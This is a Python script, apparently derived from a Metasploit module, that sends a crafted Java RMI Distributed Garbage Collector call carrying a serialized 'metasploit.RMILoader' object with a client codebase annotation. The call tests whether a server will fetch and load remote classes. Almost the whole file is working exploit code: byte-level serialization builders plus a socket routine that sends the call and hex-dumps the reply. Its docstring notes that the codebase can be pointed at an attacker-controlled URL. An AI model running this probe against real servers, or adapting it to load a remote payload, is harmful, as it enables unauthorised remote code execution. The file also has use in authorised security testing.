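"""Probe a Java RMI endpoint with a crafted DGC call carrying a client codebase.

The script opens a TCP connection to HOST:PORT (default 1099), sends the JRMI
stream-protocol handshake immediately followed by one serialized RMI call, and
prints whatever the peer sends back.  The call targets the well-known
Distributed Garbage Collector object (ObjID 2) and, in the slot where a
``java.rmi.dgc.VMID`` argument would normally be, carries a serialized object of
class ``metasploit.RMILoader`` whose class annotation names the codebase
``file:./rmidummy.jar``.  A server that still honours client-supplied codebases
will try to fetch and load that class; a server with codebase loading disabled
should reject it with a ClassNotFoundException-style error.

Security notes for whoever runs this:
  * This is an exploitation probe, not a passive scanner.  Only point it at
    systems you are authorised to test.
  * The jar named in the codebase is NOT part of this script; the server
    resolves ``file:./rmidummy.jar`` on its own side, so nothing is loaded
    unless such a file exists there (or the codebase is changed to a URL you
    control).
  * JRMI is plaintext; the whole exchange is visible on the wire.
  * The server's reply is attacker-controlled bytes.  It is printed as hex
    rather than raw to keep terminal escape sequences out of your console.

Wire-format claims below are taken from the byte layout of the original
payload plus the Java Object Serialization Stream grammar; anything marked
"believed" has not been re-verified against the JDK sources.
"""
import socket
import struct
import sys
from binascii import hexlify

DEFAULT_PORT = 1099
# Per-recv() timeout; the peer may answer with fewer chunks than expected,
# so we must not block forever waiting for a fixed number of reads.
RECV_TIMEOUT = 5.0

# ---- JRMI transport header -------------------------------------------------
JRMI_MAGIC = b"JRMI"
JRMI_VERSION = b"\x00\x02"
PROTO_STREAM = b"\x4b"  # StreamProtocol
# Endpoint the client normally sends after the server's ProtocolAck: an empty
# UTF host (length 0) and int port 0.  The original sent handshake, endpoint
# and call in a single write without waiting for the ack; that is preserved.
CLIENT_ENDPOINT = b"\x00\x00" + b"\x00\x00\x00\x00"

# ---- RMI call / Java serialization tags ------------------------------------
RMI_CALL = b"\x50"
STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = b"\x00\x05"
TC_BLOCKDATA = b"\x77"
TC_OBJECT = b"\x73"
TC_STRING = b"\x74"
TC_ARRAY = b"\x75"
TC_CLASSDESC = b"\x72"
TC_NULL = b"\x70"
TC_ENDBLOCKDATA = b"\x78"
SC_SERIALIZABLE = b"\x02"

# Target: well-known ObjID of the distributed garbage collector (objNum = 2).
DGC_OBJ_NUM = b"\x00\x00\x00\x00\x00\x00\x00\x02"
# Remaining 14 bytes of the ObjID are its UID (unique int, time long,
# count short); all zero in the original payload.
DGC_UID = b"\x00" * 14
# Operation number 0 on the DGC interface.  The argument list that follows
# (ObjID[], long, object, boolean) matches DGC.clean(ObjID[] ids,
# long sequenceNum, VMID vmid, boolean strong); believed, not re-verified.
DGC_OPNUM = b"\x00\x00\x00\x00"
DGC_INTERFACE_HASH = b"\xf6\xb6\x89\x8d\x8b\xf2\x86\x43"

OBJID_ARRAY_CLASS = b"[Ljava.rmi.server.ObjID;"
OBJID_ARRAY_SUID = b"\x87\x13\x00\xb8\xd0\x2c\x64\x7e"

# The class the server is asked to resolve, and the codebase it is told to
# resolve it from.  Both are server-side lookups; the jar is not shipped here.
LOADER_CLASS = b"metasploit.RMILoader"
LOADER_SUID = b"\xa1\x65\x44\xba\x26\xf9\xc2\xf4"
LOADER_CODEBASE = b"file:./rmidummy.jar"


def _utf(s):
    """Serialize *s* (bytes) as a modified-UTF-8 length-prefixed string."""
    return struct.pack(">H", len(s)) + s


def _class_desc(name, serial_uid, annotation):
    """Build a TC_CLASSDESC for a Serializable class with zero fields.

    ``annotation`` is the object written inside the class annotation block.
    RMI's MarshalOutputStream uses that block for the class codebase: TC_NULL
    means "no codebase", a TC_STRING supplies one.  ``superClassDesc`` is
    always TC_NULL (no serializable superclass).
    """
    return (
        TC_CLASSDESC
        + _utf(name)
        + serial_uid
        + SC_SERIALIZABLE
        + b"\x00\x00"        # fieldCount = 0
        + annotation         # classAnnotation contents (codebase)
        + TC_ENDBLOCKDATA    # end of classAnnotation
        + TC_NULL            # superClassDesc = none
    )


def build_dgc_call():
    """Return the serialized RMI call (everything after the JRMI handshake).

    Layout: RMI Call marker, serialization stream header, a TC_BLOCKDATA
    holding ObjID + opnum + interface hash, then the four call arguments.
    """
    call_header = DGC_OBJ_NUM + DGC_UID + DGC_OPNUM + DGC_INTERFACE_HASH

    # Arg 1: ObjID[] of length 0, class annotated with no codebase.
    empty_objid_array = (
        TC_ARRAY
        + _class_desc(OBJID_ARRAY_CLASS, OBJID_ARRAY_SUID, TC_NULL)
        + b"\x00\x00\x00\x00"    # array length 0
    )
    # Arg 2: long sequenceNum = 0, written as primitive block data.
    sequence_num = TC_BLOCKDATA + b"\x08" + b"\x00" * 8
    # Arg 3: the object the server must deserialize; its class descriptor
    # names metasploit.RMILoader with the codebase as class annotation.
    loader = TC_OBJECT + _class_desc(LOADER_CLASS, LOADER_SUID,
                                     TC_STRING + _utf(LOADER_CODEBASE))
    # Arg 4: boolean false (block data of 1 byte).  The trailing 0x0a is kept
    # for byte-compatibility with the original payload; it is not part of the
    # serialization grammar as far as I can tell.
    trailer = TC_BLOCKDATA + b"\x01" + b"\x00" + b"\x0a"

    return (
        RMI_CALL
        + STREAM_MAGIC
        + STREAM_VERSION
        + TC_BLOCKDATA
        + struct.pack("B", len(call_header))   # 0x22 = 34 bytes
        + call_header
        + empty_objid_array
        + sequence_num
        + loader
        + trailer
    )


def build_request():
    """Return the full on-wire request: JRMI handshake + endpoint + call."""
    return (JRMI_MAGIC + JRMI_VERSION + PROTO_STREAM + CLIENT_ENDPOINT
            + build_dgc_call())


def main(argv=None):
    """Send the probe to HOST [PORT] and hex-dump the reply.

    Returns a process exit status: 2 on usage error, 0 otherwise.  Socket
    errors propagate to the caller so a refused/unreachable target is visible.
    """
    args = sys.argv[1:] if argv is None else argv
    if not args:
        sys.stderr.write("usage: %s HOST [PORT]\n" % (sys.argv[0] if sys.argv else "rmi_probe"))
        return 2
    host = args[0]
    port = int(args[1]) if len(args) > 1 else DEFAULT_PORT

    sock = socket.create_connection((host, port), timeout=RECV_TIMEOUT)
    try:
        # sendall() rather than send(): a short write would truncate the call.
        sock.sendall(build_request())
        # Read until the peer closes or goes quiet.  The original issued five
        # unconditional recv(1024) calls, which hang if the server answers
        # with fewer chunks.
        while True:
            try:
                chunk = sock.recv(1024)
            except socket.timeout:
                break
            if not chunk:
                break
            sys.stdout.write(hexlify(chunk).decode("ascii") + "\n")
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main())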